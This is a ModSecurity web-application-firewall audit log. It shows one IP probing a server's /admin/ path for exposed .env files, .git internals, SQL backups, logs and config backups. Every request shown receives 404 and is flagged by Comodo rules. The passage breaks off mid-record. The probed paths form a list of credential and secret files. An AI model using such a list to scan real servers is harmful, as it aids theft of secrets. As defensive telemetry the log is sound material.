--b9dc953d-A-- [17/Jun/2025:05:12:16.064028 +0530] aFCr2NyZ4SMykfn97vy3PgAAAAs 185.177.72.204 43046 127.0.0.1 7080 --b9dc953d-B-- GET /admin/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b9dc953d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9dc953d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.env"] [unique_id "aFCr2NyZ4SMykfn97vy3PgAAAAs"] Stopwatch: 1750117336060613 3459 (- - -) Stopwatch2: 1750117336060613 3459; combined=2147, p1=437, p2=1582, p3=25, p4=31, p5=72, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9dc953d-Z-- --7c7da92b-A-- [17/Jun/2025:05:12:16.174980 +0530] aFCr2IoVQnPDyHnl9oPTaAAAAAY 185.177.72.204 43058 127.0.0.1 7080 --7c7da92b-B-- GET /admin/.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7c7da92b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c7da92b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.env.bak"] [unique_id "aFCr2IoVQnPDyHnl9oPTaAAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/.env.bak"] [unique_id "aFCr2IoVQnPDyHnl9oPTaAAAAAY"] Stopwatch: 1750117336171472 3560 (- - -) Stopwatch2: 1750117336171472 3560; combined=2107, p1=490, p2=1463, p3=37, p4=45, p5=72, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7c7da92b-Z-- --f34f5702-A-- [17/Jun/2025:05:12:16.285473 +0530] aFCr2ArsPejRtmHkrKLgSAAAAAE 185.177.72.204 43064 127.0.0.1 7080 --f34f5702-B-- GET /admin/.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f34f5702-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f34f5702-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.env.local"] [unique_id "aFCr2ArsPejRtmHkrKLgSAAAAAE"] Stopwatch: 1750117336282331 3186 (- - -) Stopwatch2: 1750117336282331 3186; combined=1906, p1=400, p2=1403, p3=25, p4=29, p5=49, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f34f5702-Z-- --b120887e-A-- [17/Jun/2025:05:12:16.395657 +0530] aFCr2NyZ4SMykfn97vy3PwAAAAs 185.177.72.204 43072 127.0.0.1 7080 --b120887e-B-- GET /admin/.env.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b120887e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b120887e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.env.old"] [unique_id "aFCr2NyZ4SMykfn97vy3PwAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/.env.old"] [unique_id "aFCr2NyZ4SMykfn97vy3PwAAAAs"] Stopwatch: 1750117336392665 3034 (- - -) Stopwatch2: 1750117336392665 3034; combined=1858, p1=378, p2=1354, p3=25, p4=29, p5=72, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b120887e-Z-- --fe15a75f-A-- [17/Jun/2025:05:12:16.505522 +0530] aFCr2IoVQnPDyHnl9oPTaQAAAAY 185.177.72.204 43076 127.0.0.1 7080 --fe15a75f-B-- GET /admin/.env.save HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fe15a75f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe15a75f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.env.save"] [unique_id "aFCr2IoVQnPDyHnl9oPTaQAAAAY"] Stopwatch: 1750117336502718 2847 (- - -) Stopwatch2: 1750117336502718 2847; combined=1659, p1=391, p2=1173, p3=22, p4=25, p5=48, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fe15a75f-Z-- --14ad1334-A-- [17/Jun/2025:05:12:16.616688 +0530] aFCr2FJfblPUQiSn5r2RZQAAAAA 185.177.72.204 43080 127.0.0.1 7080 --14ad1334-B-- GET /admin/.env~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --14ad1334-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --14ad1334-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.env~"] [unique_id "aFCr2FJfblPUQiSn5r2RZQAAAAA"] Stopwatch: 1750117336612713 4038 (- - -) Stopwatch2: 1750117336612713 4038; combined=2490, p1=489, p2=1829, p3=58, p4=43, p5=71, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --14ad1334-Z-- --0bb00679-A-- [17/Jun/2025:05:12:16.727715 +0530] aFCr2NyZ4SMykfn97vy3QAAAAAs 185.177.72.204 43088 127.0.0.1 7080 --0bb00679-B-- GET /admin/.git/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0bb00679-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bb00679-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.git/"] [unique_id "aFCr2NyZ4SMykfn97vy3QAAAAAs"] Stopwatch: 1750117336724644 3115 (- - -) Stopwatch2: 1750117336724644 3115; combined=1894, p1=380, p2=1396, p3=21, p4=49, p5=48, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0bb00679-Z-- --9f958956-A-- [17/Jun/2025:05:12:16.838191 +0530] aFCr2OTJOk1gXj_qIh4XtwAAAAQ 185.177.72.204 43104 127.0.0.1 7080 --9f958956-B-- GET /admin/.git/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9f958956-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f958956-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.git/HEAD"] [unique_id "aFCr2OTJOk1gXj_qIh4XtwAAAAQ"] Stopwatch: 1750117336834829 3417 (- - -) Stopwatch2: 1750117336834829 3417; combined=2107, p1=417, p2=1548, p3=36, p4=31, p5=75, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9f958956-Z-- --18435f56-A-- [17/Jun/2025:05:12:16.948928 +0530] aFCr2FJfblPUQiSn5r2RZgAAAAA 185.177.72.204 43114 127.0.0.1 7080 --18435f56-B-- GET /admin/.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --18435f56-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --18435f56-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.git/config"] [unique_id "aFCr2FJfblPUQiSn5r2RZgAAAAA"] Stopwatch: 1750117336945604 3370 (- - -) Stopwatch2: 1750117336945604 3370; combined=2096, p1=466, p2=1529, p3=23, p4=24, p5=54, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --18435f56-Z-- --83d8a864-A-- [17/Jun/2025:05:12:17.059189 +0530] aFCr2ZVkCcfT-Z8NQYzEugAAAAc 185.177.72.204 43118 127.0.0.1 7080 --83d8a864-B-- GET /admin/.git/logs/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --83d8a864-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --83d8a864-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.git/logs/HEAD"] [unique_id "aFCr2ZVkCcfT-Z8NQYzEugAAAAc"] Stopwatch: 1750117337056151 3094 (- - -) Stopwatch2: 1750117337056151 3094; combined=1819, p1=453, p2=1251, p3=24, p4=34, p5=57, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83d8a864-Z-- --92e7a35a-A-- [17/Jun/2025:05:12:17.169220 +0530] aFCr2YoVQnPDyHnl9oPTawAAAAY 185.177.72.204 43122 127.0.0.1 7080 --92e7a35a-B-- GET /admin/.gitignore HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --92e7a35a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --92e7a35a-H-- Message: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/.gitignore"] [unique_id "aFCr2YoVQnPDyHnl9oPTawAAAAY"] Stopwatch: 1750117337166409 2871 (- - -) Stopwatch2: 1750117337166409 2871; combined=1690, p1=370, p2=1209, p3=20, p4=25, p5=66, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92e7a35a-Z-- --1c107f24-A-- [17/Jun/2025:05:12:17.279630 +0530] aFCr2VJfblPUQiSn5r2RZwAAAAA 185.177.72.204 43124 127.0.0.1 7080 --1c107f24-B-- GET /admin/access.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1c107f24-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c107f24-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/access.log"] [unique_id "aFCr2VJfblPUQiSn5r2RZwAAAAA"] Stopwatch: 1750117337276559 3114 (- - -) Stopwatch2: 1750117337276559 3114; combined=1823, p1=368, p2=1351, p3=23, p4=28, p5=53, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c107f24-Z-- --ecb7b45c-A-- [17/Jun/2025:05:12:17.615586 +0530] aFCr2VJfblPUQiSn5r2RaAAAAAA 185.177.72.204 43160 127.0.0.1 7080 --ecb7b45c-B-- GET /admin/app.js.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ecb7b45c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecb7b45c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/app.js.bak"] [unique_id "aFCr2VJfblPUQiSn5r2RaAAAAAA"] Stopwatch: 1750117337612468 3173 (- - -) Stopwatch2: 1750117337612468 3173; combined=1912, p1=380, p2=1424, p3=23, p4=30, p5=55, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ecb7b45c-Z-- --de536d35-A-- [17/Jun/2025:05:12:17.726225 +0530] aFCr2ZVkCcfT-Z8NQYzEvAAAAAc 185.177.72.204 43168 127.0.0.1 7080 --de536d35-B-- GET /admin/backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --de536d35-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --de536d35-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/backup.sql"] [unique_id "aFCr2ZVkCcfT-Z8NQYzEvAAAAAc"] Stopwatch: 1750117337722913 3369 (- - -) Stopwatch2: 1750117337722913 3369; combined=1841, p1=422, p2=1292, p3=26, p4=34, p5=67, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de536d35-Z-- --e2282468-A-- [17/Jun/2025:05:12:18.606310 +0530] aFCr2pWbMc1Q3J_M-mhIcwAAAAo 185.177.72.204 43244 127.0.0.1 7080 --e2282468-B-- GET /admin/config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e2282468-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2282468-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/config.php.bak"] [unique_id "aFCr2pWbMc1Q3J_M-mhIcwAAAAo"] Stopwatch: 1750117338602718 3648 (- - -) Stopwatch2: 1750117338602718 3648; combined=2192, p1=429, p2=1626, p3=24, p4=37, p5=76, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2282468-Z-- --e5451e68-A-- [17/Jun/2025:05:12:19.268172 +0530] aFCr21JfblPUQiSn5r2RbQAAAAA 185.177.72.204 43284 127.0.0.1 7080 --e5451e68-B-- GET /admin/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e5451e68-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5451e68-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/db.sql"] [unique_id "aFCr21JfblPUQiSn5r2RbQAAAAA"] Stopwatch: 1750117339264680 3550 (- - -) Stopwatch2: 1750117339264680 3550; combined=2161, p1=411, p2=1592, p3=27, p4=32, p5=99, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e5451e68-Z-- --cd16f263-A-- [17/Jun/2025:05:12:19.708304 +0530] aFCr29yZ4SMykfn97vy3RgAAAAs 185.177.72.204 50352 127.0.0.1 7080 --cd16f263-B-- GET /admin/debug.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cd16f263-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd16f263-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file 